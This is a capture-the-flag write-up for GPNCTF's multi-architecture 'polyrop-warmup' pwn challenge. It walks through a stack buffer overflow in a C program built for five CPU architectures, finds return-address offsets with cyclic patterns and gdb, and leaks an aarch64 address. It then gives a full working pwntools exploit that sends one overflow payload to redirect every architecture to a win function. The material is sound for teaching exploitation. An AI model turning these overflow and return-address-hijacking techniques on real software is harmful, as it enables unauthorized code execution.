I picked the wrong path at Cyber Security Rumble 2024’s polypwn challenge and failed. Can you do it with more time and a win function? NOTE: Knowledge of polypwn is not required! Credit to @LevitatingLion for the original challenge and part of the code.

Category: pwn

Solver: nh1729

Flag: GPNCTF{line_breaks_in_addresses_make_me_sad_a39d9}

Writeup

Challenge Setup

This is a binary exploitation challenge. We get the source of the program to pwn composer.c and a python wrapper composer.py. The program prints a menu to either echo back a line or exit. The twist for this challenge is that the program has been compiled for 5 different architectures: s390x, aarch64, arm, riscv64 and x86_64.

$ pwn checksec composer-*
[!] Did not find any GOT entries
[*] '.../pwn/polyrop-warmup/composer-aarch64'
    Arch:     aarch64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[!] Did not find any GOT entries
[*] '.../pwn/polyrop-warmup/composer-arm'
    Arch:     arm-32-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[!] Did not find any GOT entries
[*] '.../pwn/polyrop-warmup/composer-riscv64'
    Arch:     riscv64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[!] Did not find any GOT entries
[*] '.../pwn/polyrop-warmup/composer-s390x'
    Arch:     em_s390-64-big
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[!] Did not find any GOT entries
[*] '.../pwn/polyrop-warmup/composer-x86_64'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

The wrapper starts a qemu instance with the executable for each arcitecture under a different user. Every line we send is multiplexed to every of these processes. The wrapper then waits for all processes to output something, prints these outputs and accepts new input.

The flag can be obtained from the wrapper under a specific condition: Every architecture receives an in-memory file on file descriptor 42. These files contain random tokens and if we submit all of these tokens to the wrapper, it prints the flag.

Therefore, we want to make all binaries of the program read from file descriptor 42 and print the result back to us. The program includes a win function which does exactly that:

void win() {
    char buf[0x11] = {0};
    read(42, buf, 0x10);
    write(1, buf, 0x10);
    printf("this printf solely exists to shift some stuff around in the binary...\n");
}

However, this function is never called. Instead, there is a buffer overflow in the function that echoes back a user provided line:

static void add_composer(void) {
    char buf[0x20];
    puts("enter composer:");
    int i = 0, c;
    while ((c = xgetchar()) != '\n') {
        buf[i++] = c;
    }
    fputs("composer: ", stdout);
    puts(buf);
    // TODO: add composer to db
}

The while loop behaves almost exactly like the unsafe gets function, except that xgetchar is a custom function that exits on EOF.

Solution

The setup invites for return oriented programming (ROP), we just™ have to make all architectures jump to win on return from this function. This could be possible because return addresses are at different stack offsets from our buffer for all architectures, enabling us to replace it with the respective win address in each architecture, all in one overflow.

We started off by finding the offsets for return addresses. Since we are used to x86_64, we opened it first in Ghidra and found that the add_composer function is inlined into main, meaning it is compiled as if someone replaced the call statement with the implementation. The next return is thus the one of main, which we can trigger within the menu.

Decompiled source x86_64

Looking at the stack layout, we find the offset to the return address:

Stack layout x86_64

With x86_64, the -0x58 indicates that buf starts 0x58 bytes before the return address. We therefore have to put the win address at 0x58 in the buffer. I naively proceeded identically for aarch64, arm and riscv64, but would later find out that the offsets do not work the same on them. s390x is not supported by Ghidra.

For the win addresses, we started the binaries with qemu-${ARCH} -g 1234 composer-${ARCH} and connected to them using gdb-multiarch with pwndbg:

pwndbg> target remote localhost:1234
`target:/.../polyrop-warmup/composer-aarch64' has disappeared; keeping its symbols.
Remote debugging using localhost:1234
Failed to read a valid object file image from memory.
0x00007fbe0c6704c0 in _start ()
pwndbg> i addr win
Symbol "win" is at 0x7fbe0c6707e4 in a file compiled without debugging.

The addresses were:

  • 0x411238 for arm
  • 0x5555555584b1 for x86_64
  • 0x7fbe0c6707e4 for aarch64
  • 0x5555555568fa for riscv
  • 0x2aa00000b20 for s390x. pwngdb did not known this architecture, but i addr win worked nonetheless.

Note that QEMU loads all except aarch64 at static addresses, despite the binaries being compiled as PIE. We can leak ASLR for aarch64 by printing a composer string that reaches just short of the original return address because the input is not null terminated.

For the return address offset of s390x, I started the binary and pasted the output of cyclic 200 into the composer prompt.

qemu-s390x -g 1234 composer-s390x # Connect with gdb-multiarch, continue
welcome to advanced composer manager 5000!!  menu:  1. add composer  2. exit
1
enter composer:
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
composer: aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
2

With that, gdb displayed

Program received signal SIGSEGV, Segmentation fault.
0x6c6161626d616162 in ?? ()

As s390x is big-endian, 0x6c6161626d616162 decodes to "laabmaab". This appears at offset 0x90 in cyclic.

With all offsets in hand (or so we thought), we built a small exploit:

from pwn import *
from ast import literal_eval

archs = ["s390x", "aarch64", "arm", "riscv64", "x86_64"]
r = process('python ./composer.py', shell=True)

def read_response(r):
    out = {}
    for a in archs:
        r.recvuntil(f'{a}: '.encode())
        result : bytes = literal_eval(r.recvline().decode())
        out[a] = result
    return out

print(read_response(r))
r.sendline(b'1')
print(read_response(r))
r.sendline(b'A' * 0x28)
A = read_response(r)

aarch_leak = int.from_bytes(A['aarch64'][len(b'composer: ') + 0x28:-1], 'little')
aarch_win = aarch_leak - 0x7fd5ae42eb90 + 0x7fd5ae42e7e4

payload = flat({
    0x40: int.to_bytes(0x411238, 4, 'little'), # arm
    0x58: int.to_bytes(0x5555555584b1, 8, 'little'), # x86_64
    0x60: int.to_bytes(aarch_win, 8, 'little'), # aarch64
    0x78: int.to_bytes(0x5555555568fa, 8, 'little'), # riscv
    0x90: int.to_bytes(0x2aa00000b20, 8, 'big'), # s390x
})
r.sendline(b'1')
print(read_response(r))
r.sendline(payload)
read_response(r)
r.sendline(b'2')
r.interactive()

Output:

s390x: b'd5ca90029e532d45this printf solely exists to shift some stuff around in the binary...\n'
aarch64: b''
arm: b''
riscv64: b''
x86_64: b'86eaf80b7d976ab0this printf solely exists to shift some stuff around in the binary...\n'

Hm, that were fewer successful architectures than I expected. While running the script, the kernel dropped coredumps into the working directory. Inspecting these, the architectures crashed at other addresses from cyclic. Apparently the heuristic that buf at stack-X does not imply we need to overflow X bytes on all architectures, just on X86_64. Using the same technique as for s390x, we found real offsets.

With these in hand, all architectures printed their tokens and we could complete our exploit.

Exploit

from pwn import *
from ast import literal_eval

archs = ["s390x", "aarch64", "arm", "riscv64", "x86_64"]
# r = process('python ./composer.py', shell=True)
r = remote("wiggle--snoop-dogg-1893.ctf.kitctf.de", "443", ssl=True)

def read_response(r):
    out = {}
    for a in archs:
        r.recvuntil(f'{a}: '.encode())
        result: bytes = literal_eval(r.recvline().decode())
        out[a] = result
    return out

# Leak aarch64 address
print(read_response(r))
r.sendline(b'1')
print(read_response(r))
r.sendline(b'A' * 0x28)
A = read_response(r)

aarch_leak = int.from_bytes(A['aarch64'][len(b'composer: ') + 0x28:-1], 'little')
aarch_win = aarch_leak - 0x7fd5ae42eb90 + 0x7fd5ae42e7e4 # Magic numbers from exemplary execution

payload = flat({
    0x90: int.to_bytes(0x2aa00000b20, 8, 'big'),     # s390x
    0x28: int.to_bytes(aarch_win, 8, 'little'),      # aarch64
    0x3c: int.to_bytes(0x411238, 4, 'little'),       # arm
    0x70: int.to_bytes(0x5555555568fa, 8, 'little'), # riscv64
    0x58: int.to_bytes(0x5555555584b1, 8, 'little'), # x86_64
})

# Overflow
r.sendline(b'1')
print(read_response(r))
r.sendline(payload)

# Return from main
read_response(r)
r.sendline(b'2')

tokens_raw = read_response(r)

r.sendline(b'magic word')
for a in archs:
    r.sendline(tokens_raw[a][:16])

r.interactive()